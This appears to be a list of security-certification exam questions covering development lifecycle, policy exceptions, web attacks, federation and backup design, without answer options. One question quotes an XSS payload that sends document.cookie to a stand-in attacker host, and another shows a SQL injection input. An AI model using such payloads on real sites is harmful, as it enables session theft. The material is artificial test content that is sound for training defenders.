A company is in the process of implementing a new front end user interface for its customers, the goal is to
provide them with more self service functionality. The application has been written by developers over the last
six months and the project is currently in the test phase. Which of the following security activities should be
implemented as part of the SDL in order to provide the MOST security coverage over the solution? (SelectTWO).

The Information Security Officer (ISO) is reviewing new policies that have been recently made effective andnow apply to the company. Upon review, the ISO identifies a new requirement to implement two-factor
authentication on the company’s wireless system. Due to budget constraints, the company will be unable to
implement the requirement for the next two years. The ISO is required to submit a policy exception form to the
Chief Information Officer (CIO). Which of the following are MOST important to include when submitting the
exception form? (Select THREE).

A security administrator notices the following line in a server’s security log:
<input name=’credentials’ type=’TEXT’ value='” +
request.getParameter(‘><script>document.location=’http://badsite.com/?q=’document.cooki e</script>’) + “‘;
The administrator is concerned that it will take the developer a lot of time to fix the application that is running on
the server. Which of the following should the security administrator implement to prevent this particular attack?

A security manager has received the following email from the Chief Financial Officer (CFO):
“While I am concerned about the security of the proprietary financial data in our ERP application, we have had
a lot of turnover in the accounting group and I am having a difficult time meeting our monthly performance
targets. As things currently stand, we do not allow employees to work from home but this is something I am
willing to allow so we can get backon track. What should we do first to securely enable this capability for my group?” Based on the information
provided, which of the following would be the MOST appropriate response to the CFO?

select id, firstname, lastname from authors User input= firstname= Hack;man lastname=Johnson Which of the
following types of attacks is the user attempting?

Joe, a hacker, has discovered he can specifically craft a webpage that when viewed in a browser crashes the
browser and then allows him to gain remote code execution in the context of the victim’s privilege level. The
browser crashes due to an exception error when a heap memory that is unused is accessed. Which of thefollowing BEST describes the application issue?

A mature organization with legacy information systems has incorporated numerous new processes and
dependencies to manage security as its networks and infrastructure are modernized. The Chief Information
Office has become increasingly frustrated with frequent releases, stating that the organization needs everything
to work completely, and the vendor should already have those desires built into the software product. The
vendor has been in constant communication with personnel and groups within the organization to understand
its business process and capture new software requirements from users. Which of the following
methods of software development is this organization’s configuration management process using?

An organization would like to allow employees to use their network username and password to access a thirdparty service. The company is using Active Directory Federated Services for their directory service. Which of
the following should the company ensure is supported by the third-party? (Select TWO).

An organization is concerned with potential data loss in the event of a disaster, and created a backup
datacenter as a mitigation strategy. The current storage method is a single NAS used by all servers in both
datacenters. Which of the following options increases data availability in the event of a datacenter failure?

A software project manager has been provided with a requirement from the customer to place limits on the
types of transactions a given user can initiate without external interaction from another user with elevated
privileges. This requirement is BEST described as an implementation of: